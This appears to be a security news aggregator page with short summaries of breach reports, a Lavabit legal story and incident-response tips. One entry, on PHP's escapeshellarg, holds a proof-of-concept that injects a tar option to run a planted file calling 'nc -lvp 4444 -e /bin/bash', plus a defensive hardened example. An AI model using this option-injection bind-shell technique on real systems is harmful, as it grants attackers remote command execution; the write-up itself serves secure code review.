Top IT Security Bloggers

  • MacRumors hacked – 860,000 email addresses and hashed passwords stolen

    Graham Cluley
    The forums of popular Apple news website MacRumors were hacked, exposing the usernames, email addresses and hashed passwords of over 860,000 members.
  • DOJ: ‘Locking its front gate’ doesn’t let Lavabit off the hook for search warrants

    Sophos - Naked Security
    You can't get out of cooperating with government-ordered electronic surveillance by shutting down, any more than a business can stop police from executing a search warrant by locking its front gate, the US government tutted at former encrypted-email provider Lavabit.
  • Pot-smoking 419ers busted in hotel room crime hub

    Sophos - Naked Security
    Hotel internet connections make it harder to track people down, and after police were called to investigate the smell of marijuana emanating from a South African hotel room, they discovered an advanced Nigerian letter scam crime hub.
  • Feds Charge Calif. Brothers in Cyberheists

    Krebs on Security
    Federal authorities have arrested two young brothers in Fresno, Calif. and charged the pair with masterminding a series of cyberheists that siphoned millions of dollars from personal and commercial bank accounts at U.S. banks and brokerages.
  • Unusual BHEK-Like Spam With Attachment Found

    Trend Micro - Security Intelligence
    Soon after Paunch was arrested, we found that the flow of spam campaigns going to sites with the Blackhole Exploit Kit (BHEK) had slowed down considerably. Instead, we saw an increase in messages with a malicious attachment. Recently, however, we came across rather unusual spam samples that combine characteristics of both attacks. Figure 1. Spammed […]
    Post from: Trendlabs Security Intelligence Blog - by Trend Micro
  • Microsoft leads the way, setting new cryptographic defaults

    Sophos - Naked Security
    Microsoft is upping its game with regards to cryptographic standards. By discontinuing support for the older, weak RC4 cipher and putting Certificate Authorities on notice to migrate to SHA-2, it seems to be leading the way to be ready for the future, rather than reacting.
  • Security issues with using PHP's escapeshellarg

    Bae Systems Detica
    Using user-supplied data on the command line is traditionally a security disaster waiting to happen. In an infinite universe there are, however, times when you might need to do just that. You will be glad to know that PHP provides two functions to aid you with security in those situations: escapeshellcmd and escapeshellarg.

    The PHP documentation defines these functions as:

    escapeshellcmd() escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. This function should be used to make sure that any data coming from user input is escaped before this data is passed to the exec() or system() functions, or to the backtick operator. The following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.

    escapeshellarg() adds single quotes around a string and quotes/escapes any existing single quotes, allowing you to pass a string directly to a shell function and have it be treated as a single safe argument. This function should be used to escape individual arguments to shell functions coming from user input. The shell functions include exec(), system() and the backtick operator.

    There are some caveats around the use of these functions which the documentation doesn't cover: command line switches inside single quotes are still treated as command line switches. For example, ls '--help' will print the help text for the ls command. Thus it may be possible to inject data that alters the intended execution, typically referred to as command injection.

    In order to illustrate this bug I have created a simple proof-of-concept script which will spawn a bind shell on port 4444 by diverting the execution of tar with command line switches:

        <?php
        # PoC exploit of php not escaping dash characters in escapeshellarg/cmd
        # Reference: http://php.net/manual/en/function.escapeshellarg.php
        # Written by Eldar "Wireghoul" Marcussen
        # Create a malicious file:
        $fh = fopen('myfile.png', 'w');
        fwrite($fh, "<?php system('nc -lvp 4444 -e /bin/bash'); echo 'WINRAR!'; ?>");
        fclose($fh);
        # I choose to use php here, you could use whatever binary you like
        $safe_opts = escapeshellarg('--use-compress-program=php');
        $safe_file = escapeshellarg('myfile.png'); # Really a php script with a .png extension
        system("tar $safe_opts -cf export.tar $safe_file");
        ?>

    The response from the PHP security team is that this is expected behaviour, and that it is not possible to protect programs that use parameters in unsafe ways. While I understand their point of view, I still feel that the documentation does not clearly highlight the potential risk around using escapeshellarg. If you are doing source code reviews, I would take a closer look at any operation which relies on escapeshellarg to sanitise user-supplied input.
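    The defensive counterpart to the caveat above, as an added example that is not part of the original article and not code from PHP's documentation or the author: escapeshellarg() only protects the shell, so a value that starts with a dash must additionally be kept from reaching the program as an option. The hardened function below applies two independent controls, an allowlist on the file name and the "--" end-of-options marker that tar and most GNU tools honour. The function names export_unsafe and export_hardened, the allowlist pattern and the sample inputs are all constructed for this illustration; the functions build and return the command string rather than executing it, so the comparison can be run harmlessly.

```php
<?php
// Added example: keeping a user-supplied file name from being parsed as a
// tar option. escapeshellarg() quotes for the shell only; it does not stop
// '--use-compress-program=php' from being read by tar as a switch.
declare(strict_types=1);

// The pattern the article warns about: shell-safe, but option-unsafe.
function export_unsafe(string $userFile): string
{
    return 'tar -cf export.tar ' . escapeshellarg($userFile);
}

// Hardened form (constructed for this example).
function export_hardened(string $userFile): string
{
    // Control 1: allowlist. Accept a plain basename made of word characters,
    // dots and dashes that does not begin with a dash or a dot. This rejects
    // '--anything', '../x', names with spaces or slashes, and overlong names.
    if (!preg_match('/^[A-Za-z0-9_][A-Za-z0-9_.-]{0,254}$/', $userFile)) {
        throw new InvalidArgumentException('file name rejected by allowlist');
    }
    // Control 2: end-of-options marker. Everything after "--" is positional,
    // so even if the allowlist is loosened later, tar will not treat the
    // value as a switch. escapeshellarg() still handles shell metacharacters.
    return 'tar -cf export.tar -- ' . escapeshellarg($userFile);
}

// Constructed inputs: one benign name, the option-style payload from the
// article, and a path-traversal attempt.
$inputs = ['report.png', '--use-compress-program=php', '../etc/passwd'];

foreach ($inputs as $in) {
    printf("input: %s\n", $in);
    printf("  unsafe:   %s\n", export_unsafe($in));
    try {
        printf("  hardened: %s\n", export_hardened($in));
    } catch (InvalidArgumentException $e) {
        printf("  hardened: %s\n", $e->getMessage());
    }
}
```

    Running the script shows the unsafe form quoting all three inputs without complaint, while the hardened form accepts only report.png and emits tar -cf export.tar -- 'report.png'. In a code review, the presence of escapeshellarg() on its own is therefore not evidence that an argument is safe; look for the "--" separator or an allowlist in front of it.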
  • Loyaltybuild attack: 500,000 people may have had credit card details stolen

    Sophos - Naked Security
    Thousands of people across Europe and, more specifically, in Northern Ireland have had their credit card and personal details stolen after a company which runs reward schemes was hacked.
Security Awareness Tip

Incident handling is a vast topic, but here are a few tips for you to consider in your incident response. I hope you never have to use them, but the odds are at some point you will and I hope being ready saves you pain (or your job!).


  1. Have an incident response plan.

  2. Pre-define your incident response team.

  3. Define your approach: watch and learn or contain and recover.

  4. Pre-distribute call cards.

  5. Forensic and incident response data capture.

  6. Get your users on-side.

  7. Know how to report crimes and engage law enforcement.

  8. Practice makes perfect.

For the full breakdown on this article

Security ABC Guides

Warning: Tips for secure mobile holiday shopping

I’m dating myself, but I remember when holiday shopping involved poring through ads in the Sunday paper, placing actual phone calls from tethered land lines to research product stock and availability, and actually driving places to pick things up. Now, holiday shoppers can do all of that from a smartphone or tablet in a few seconds, but there are some security pitfalls to be aware of.